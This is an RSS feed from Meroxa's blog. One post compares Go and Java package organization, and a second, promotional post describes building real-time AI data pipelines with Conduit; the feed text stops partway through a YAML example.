<?xml version="1.0" encoding="UTF-8"?><rss xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:atom="http://www.w3.org/2005/Atom" version="2.0"><channel><title><![CDATA[Meroxa - Blog & Insights]]></title><description><![CDATA[Meroxa is the industry-leading low-code real-time data streaming platform. Explore our platform for free!]]></description><link>https://meroxa.com</link><generator>GatsbyJS</generator><lastBuildDate>Thu, 21 Aug 2025 21:14:05 GMT</lastBuildDate><item><title><![CDATA[From Java to Go, Part 2: Packages]]></title><description><![CDATA[Explore how Go organizes code with packages and directories—and why it’s often cleaner than Java’s approach. A practical comparison from a Java developer learning Go.]]></description><link>https://meroxa.com/blog/from-java-to-go-part-2-packages</link><guid isPermaLink="false">https://meroxa.com/blog/from-java-to-go-part-2-packages</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Wed, 25 Jun 2025 17:53:00 GMT</pubDate><content:encoded>&lt;p&gt;This blog post is part of a series where I write about my experiences when learning Go. I&apos;ll also be sharing my thoughts about some of the differences between Java and Go. In the &lt;a href=&quot;https://meroxa.com/blog/from-java-to-go-a-developers-journey-pt-1/&quot;&gt;previous blog post&lt;/a&gt;, you can find some resources and real-life projects through which I learned Go. You can also learn about some of the differences in interfaces, functions, and error handling. This blog post will focus on organizing code through packages and directories. In the end, I mention why I believe Java&apos;s approach to packages should improve and be more like what Go does.&lt;/p&gt;
&lt;h2&gt;Packages, directories, and files&lt;/h2&gt;
&lt;p&gt;Go doesn&apos;t require that the directory (physical) structure matches the package (logical) structure as Java does. There&apos;s one similarity here, and that is that &lt;em&gt;a single directory can hold only a single package&lt;/em&gt;. Let&apos;s take a look at this example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;pkg/foo
├── a.go
└── b.go&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code class=&quot;language-text&quot;&gt;a.go&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;b.go&lt;/code&gt; &lt;em&gt;can&lt;/em&gt; belong to the package &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt;, but usually, the package name matches the directory name (i.e., &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;There are no limitations to the types that &lt;code class=&quot;language-text&quot;&gt;a.go&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;b.go&lt;/code&gt; can contain (whereas in Java, a public class &lt;code class=&quot;language-text&quot;&gt;Foo&lt;/code&gt; has to be declared in &lt;code class=&quot;language-text&quot;&gt;Foo.java&lt;/code&gt;)&lt;/p&gt;
&lt;h2&gt;Imports&lt;/h2&gt;
&lt;p&gt;A Go package&apos;s import path is its &lt;a href=&quot;https://go.dev/ref/mod#module-path&quot;&gt;module path&lt;/a&gt; joined with its sub-directory within the module, for example:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;fmt&quot;&lt;/span&gt;
	&lt;span class=&quot;token string&quot;&gt;&quot;github.com/example/myservice&quot;&lt;/span&gt;
	acme_service &lt;span class=&quot;token string&quot;&gt;&quot;github.com/acmeinc/myservice&quot;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token keyword&quot;&gt;func&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;main&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
	c &lt;span class=&quot;token operator&quot;&gt;:=&lt;/span&gt; myservice&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;NewClient&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;http://localhost:8080&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	fmt&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Println&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;c&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;GetInfo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
	
	acme_service&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;Run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Imports are allowed to have aliases, which is useful when there are packages with the same name.&lt;/p&gt;
&lt;p&gt;A notable limitation is that circular dependencies between packages are not allowed (i.e., if &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt; imports &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt;, &lt;strong&gt;directly or indirectly&lt;/strong&gt;, then &lt;code class=&quot;language-text&quot;&gt;bar&lt;/code&gt; is not allowed to import &lt;code class=&quot;language-text&quot;&gt;foo&lt;/code&gt;, directly or indirectly).&lt;/p&gt;
&lt;h2&gt;Can packages be organized into hierarchies?&lt;/h2&gt;
&lt;p&gt;If you always refer to a type as &lt;code class=&quot;language-text&quot;&gt;packageName.typeName&lt;/code&gt;, does this mean you can have only one package in your hierarchy? And how do you cope with complex projects?&lt;/p&gt;
&lt;p&gt;Go packages don&apos;t have a hierarchy (whereas Java packages do). This may become a problem in complex projects (but when that happens, we should check if the project is too complex and needs to be divided). You can still organize the code in as many directories as your file system allows you. Here&apos;s an example from the &lt;a href=&quot;https://github.com/ConduitIO/conduit&quot;&gt;Conduit&lt;/a&gt; project:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;pkg/
├── conduit
├── connector
├── foundation
│   ├── cerrors
│   ├── ctxutil
│   ├── grpcutil
│   ├── log
│   └── metrics
│       ├── measure
│       ├── noop
│       └── prometheus
├── http
│   ├── api
│   │   ├── fromproto
│   │   ├── status
│   │   └── toproto
│   └── openapi
│       └── swagger-ui
│           └── api
│               └── v1
├── inspector
├── lifecycle
│   └── stream
├── lifecycle-poc
│   └── funnel
├── orchestrator&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h2&gt;Packages and type names&lt;/h2&gt;
&lt;p&gt;Let&apos;s assume that we&apos;re working on a driver for a database called &lt;code class=&quot;language-text&quot;&gt;FantasticDB&lt;/code&gt;. We&apos;ll need the following types: &lt;code class=&quot;language-text&quot;&gt;Database&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Client&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Table&lt;/code&gt;, etc.&lt;/p&gt;
&lt;p&gt;In Java, you&apos;ll end up with something like:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;io.fantasticdb.client.Client&lt;/code&gt; , or&lt;/li&gt;
&lt;li&gt;&lt;code class=&quot;language-text&quot;&gt;io.fantasticdb.client.FantasticDBClient&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Both are pretty common and, at least in my experience, the latter one is more common than the first one.&lt;/p&gt;
&lt;p&gt;In Go, we would have &lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt;, and that&apos;s it. There&apos;s no package hierarchy and repeating the package name in a type name (so-called stuttering, which should be avoided in Go code), which leaves us with &lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt;.&lt;/p&gt;
&lt;h2&gt;If I were to change one or the other…&lt;/h2&gt;
&lt;p&gt;…I&apos;d make Java packages work as they do in Go.:) And here&apos;s why.&lt;/p&gt;
&lt;p&gt;Let&apos;s say we&apos;re working on a type that manages user data, which is stored in a fictional &lt;strong&gt;FantasticDB&lt;/strong&gt; database and cached using &lt;strong&gt;LightningCache&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;The Java code could look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;java&quot;&gt;&lt;pre class=&quot;language-java&quot;&gt;&lt;code class=&quot;language-java&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;public&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;class&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;UserService&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token comment&quot;&gt;// option 1&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;FantasticDBClient&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;LightningCacheClient&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    
    &lt;span class=&quot;token comment&quot;&gt;// option 2&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;fantasticdb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; db&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;private&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// option 1&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;setCache&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;LightningCacheClient&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cache &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// option 2&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;void&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;setCache&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token class-name&quot;&gt;&lt;span class=&quot;token namespace&quot;&gt;io&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;/span&gt;Client&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;cache &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; cache&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Option 1 reads nicely in the &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt; package as it&apos;s more concise. However, it&apos;s not the preferred choice for the authors of FantasticDB and LightningCache. Within a &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; library and an &lt;code class=&quot;language-text&quot;&gt;io.fantasticdb&lt;/code&gt; package, a &lt;code class=&quot;language-text&quot;&gt;FantasticDBClient&lt;/code&gt; is too verbose. Option 2 is the opposite. (In practice, we see option 1 a lot.) In many real-world examples, we&apos;ll see even longer package names with more nesting.&lt;/p&gt;
&lt;p&gt;Once you start thinking about it, the problem is in the package name: it&apos;s nested and long.&lt;/p&gt;
&lt;p&gt;The Go code would look like this:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;go&quot;&gt;&lt;pre class=&quot;language-go&quot;&gt;&lt;code class=&quot;language-go&quot;&gt;&lt;span class=&quot;token comment&quot;&gt;// fantasticdb/client.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; fantasticdb

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Client &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// lightningcache/client.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; lightningcache

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Client &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;// users.go&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;package&lt;/span&gt; users

&lt;span class=&quot;token keyword&quot;&gt;type&lt;/span&gt; Users &lt;span class=&quot;token keyword&quot;&gt;struct&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    db     fantasticdb&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
    cache  lightningcache&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;Client
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Why does this code (for the “external” packages and our code alike) look cleaner? It&apos;s because of the package name: its declaration (in the &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;lightningcache&lt;/code&gt; packages) and its usage (in the &lt;code class=&quot;language-text&quot;&gt;users&lt;/code&gt; package). Also, the dot in the variable declaration makes it more readable (&lt;code class=&quot;language-text&quot;&gt;fantasticdb.Client&lt;/code&gt; vs &lt;code class=&quot;language-text&quot;&gt;FantasticDbClient&lt;/code&gt;)&lt;/p&gt;
&lt;h2&gt;A win-win strategy?&lt;/h2&gt;
&lt;p&gt;We have two personas working with code:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the &lt;strong&gt;author&lt;/strong&gt; of the code&lt;/li&gt;
&lt;li&gt;and the &lt;strong&gt;user&lt;/strong&gt; of the code (a developer writing new code and using existing packages)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Their interests sometimes clash, as we&apos;ve seen above.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;code author&lt;/strong&gt; typically prefers simple class names. But those names, like &lt;code class=&quot;language-text&quot;&gt;Database&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;Client&lt;/code&gt;, or &lt;code class=&quot;language-text&quot;&gt;Table&lt;/code&gt;, are often already used by other packages or libraries. In our &lt;code class=&quot;language-text&quot;&gt;FantasticDB&lt;/code&gt; example, these types are perfectly clear within the &lt;code class=&quot;language-text&quot;&gt;fantasticdb&lt;/code&gt; package. There&apos;s no need to name them &lt;code class=&quot;language-text&quot;&gt;FantasticDBDatabase&lt;/code&gt; or &lt;code class=&quot;language-text&quot;&gt;FantasticDBTable&lt;/code&gt;. Doing so would only bloat the codebase unnecessarily.&lt;/p&gt;
&lt;p&gt;A &lt;strong&gt;code user&lt;/strong&gt;, on the other hand, wants names to be specific and meaningful at the point of use. This often leads to “squeezing” extra context into type names, especially when package names are long or nested.&lt;/p&gt;
&lt;p&gt;In this context, Go&apos;s approach to packages strikes a nice balance: it&apos;s a win-win for both the code author and the code user.&lt;/p&gt;
&lt;h2&gt;Final thoughts&lt;/h2&gt;
&lt;p&gt;When I started programming in Go, I didn&apos;t expect that I&apos;d be spending this much time on packages. Nor did I expect that I&apos;d start with a brief comparison of packages and end up with a whole blog post just about packages.:) It reminded me how even some basic language features can trigger a lot of thinking.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Build AI That Keeps Up: Real-Time Pipelines with Conduit]]></title><description><![CDATA[Modern AI applications demand real-time data to be truly effective. Whether you're building intelligent customer support systems, dynamic recommendation engines, or adaptive fraud detection models, the value of AI diminishes rapidly as data ages. In many cases, the difference between real-time and batch processing isn't just about speed—it's about relevance, accuracy, and competitive advantage.]]></description><link>https://meroxa.com/blog/build-ai-that-keeps-up-real-time-pipelines-with-conduit</link><guid isPermaLink="false">https://meroxa.com/blog/build-ai-that-keeps-up-real-time-pipelines-with-conduit</guid><dc:creator><![CDATA[James Martinez]]></dc:creator><pubDate>Thu, 12 Jun 2025 10:30:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;em&gt;The age of batch processing AI models with stale data is over. Here&apos;s why real-time data streaming is essential for AI applications that actually matter—and how to build them without the complexity.&lt;/em&gt;&lt;/p&gt;
&lt;h2&gt;The Real-Time AI Revolution&lt;/h2&gt;
&lt;p&gt;Imagine your customer support team receiving a flood of urgent tickets, but your AI summarization system only processes them once every hour. Or picture your RAG (Retrieval Augmented Generation) knowledge base being updated with critical company policies, but your AI chatbot won&apos;t know about them until tomorrow&apos;s batch job runs.&lt;/p&gt;
&lt;p&gt;This isn&apos;t just inefficient—it&apos;s actively harmful to business outcomes.&lt;/p&gt;
&lt;p&gt;Modern AI applications demand &lt;strong&gt;real-time data&lt;/strong&gt; to be truly effective. Whether you&apos;re building intelligent customer support systems, dynamic recommendation engines, or adaptive fraud detection models, the value of AI diminishes rapidly as data ages. In many cases, the difference between real-time and batch processing isn&apos;t just about speed—it&apos;s about relevance, accuracy, and competitive advantage.&lt;/p&gt;
&lt;h2&gt;The Hidden Cost of Stale Data in AI Systems&lt;/h2&gt;
&lt;p&gt;Traditional data processing approaches were designed for a different era. When AI models were primarily used for offline analytics and periodic reporting, batch processing made sense. But today&apos;s AI applications are &lt;strong&gt;operational tools&lt;/strong&gt; that need to respond to the world as it changes.&lt;/p&gt;
&lt;p&gt;Consider these real-world scenarios where stale data kills AI effectiveness:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Customer Support Automation&lt;/strong&gt;: An AI system that summarizes support tickets from this morning&apos;s batch can&apos;t help with the urgent issues flooding in right now. By the time the system processes today&apos;s tickets, it’s tomorrow.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic Pricing Models&lt;/strong&gt;: E-commerce AI that adjusts prices based on yesterday&apos;s inventory and competitor data is making decisions with outdated information. In fast-moving markets, this can mean lost revenue or overpriced inventory that won&apos;t sell.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Fraud Detection&lt;/strong&gt;: Financial AI models that operate on hourly batches of transaction data are fighting yesterday&apos;s fraud patterns. Modern fraudsters move fast—your AI needs to move faster.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Content Personalization&lt;/strong&gt;: Recommendation systems that update user preferences once per day miss the real-time signals that indicate changing interests, seasonal demands, or trending topics.&lt;/p&gt;
&lt;p&gt;The pattern is clear: &lt;strong&gt;AI systems that operate on stale data are reactive instead of proactive&lt;/strong&gt;. They&apos;re always one step behind the problems they&apos;re supposed to solve.&lt;/p&gt;
&lt;h2&gt;Why Traditional Automation Falls Short&lt;/h2&gt;
&lt;p&gt;Most organizations start their AI automation journey with familiar tools and patterns. They set up database triggers, cron jobs, and scheduled ETL processes. While these approaches work for many use cases, they create fundamental limitations for AI workflows:&lt;/p&gt;
&lt;h3&gt;Database Triggers: The Complexity Trap&lt;/h3&gt;
&lt;p&gt;Database triggers seem like an obvious solution, but quickly become a maintenance nightmare:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Tight Coupling&lt;/strong&gt;: AI logic becomes embedded in database code, making it difficult to test and deploy independently&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Limited Scalability&lt;/strong&gt;: Database resources are shared between your application and AI processing&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error Handling Complexity&lt;/strong&gt;: Failed AI processing requires complex retry logic built into your database layer&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Multi-Database Challenges&lt;/strong&gt;: Modern applications spanning multiple databases require complex coordination&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Scheduled Jobs: The Latency Problem&lt;/h3&gt;
&lt;p&gt;Cron jobs are reliable but fundamentally batch-oriented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Fixed Intervals&lt;/strong&gt;: Data waits unnecessarily while jobs create artificial processing delays&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Resource Waste&lt;/strong&gt;: Jobs run during low-activity periods and may not run frequently enough during peaks&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Recovery Complexity&lt;/strong&gt;: Determining what data was missed during failures becomes an operational burden&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Traditional approaches also struggle with &lt;strong&gt;integration complexity&lt;/strong&gt;. Modern AI workflows require connecting multiple data sources, calling external AI services, and coordinating results across various systems—all while handling different APIs, authentication mechanisms, and error conditions.&lt;/p&gt;
&lt;h2&gt;Enter Change Data Capture and Stream Processing&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Change Data Capture (CDC)&lt;/strong&gt; represents a fundamentally different approach. Instead of polling databases or relying on triggers, CDC captures data changes at the transaction log level and streams them in real-time.&lt;/p&gt;
&lt;p&gt;CDC offers key advantages:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;True Real-Time Processing&lt;/strong&gt;: Sub-second latency for data changes&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Minimal Database Impact&lt;/strong&gt;: Operates by reading transaction logs, not adding load&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Complete Change History&lt;/strong&gt;: Captures full data evolution over time&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Guaranteed Delivery&lt;/strong&gt;: Strong consistency guarantees prevent data loss&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;But you need a &lt;strong&gt;streaming platform&lt;/strong&gt; that can connect multiple sources, apply AI transformations, handle errors gracefully, and provide operational visibility.&lt;/p&gt;
&lt;h2&gt;Why Conduit Changes the Game for AI Workflows&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://conduit.io/&quot;&gt;Conduit&lt;/a&gt; was built specifically to address these challenges. It provides a unified platform for building real-time data pipelines that integrate seamlessly with AI services and modern data infrastructure.&lt;/p&gt;
&lt;h3&gt;Real-Time by Design&lt;/h3&gt;
&lt;p&gt;Conduit uses CDC and other real-time mechanisms to capture data changes instantly:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; postgres&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;source
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgres&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;source&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;tables&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;customer_interactions&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;url&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;DATABASE_URL&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This simple configuration creates a real-time stream of changes from your PostgreSQL database. No triggers, no polling, no scheduled jobs—just immediate capture of data as it changes.&lt;/p&gt;
&lt;h3&gt;AI Integration Made Simple&lt;/h3&gt;
&lt;p&gt;Integrating AI services into traditional data pipelines often requires custom code, error handling, and infrastructure management. Conduit makes AI integration declarative:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;id&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; sentiment&lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt;analysis
    &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;openai.textgen&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;api_key&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; $&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;OPENAI_API_KEY&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;model&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;gpt-4&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;.customer_message&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;prompt&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Analyze the sentiment of this customer message and classify as positive, negative, or neutral.&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This processor automatically handles API authentication, rate limiting, error retries, and response parsing. Your AI logic becomes a configuration, not custom code.&lt;/p&gt;
&lt;h3&gt;Complex Workflows, Simple Configuration&lt;/h3&gt;
&lt;p&gt;Real-world AI pipelines require multiple processing steps and service integrations. Conduit makes sophisticated workflows simple through declarative configuration:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;# Generate AI summary&lt;/span&gt;
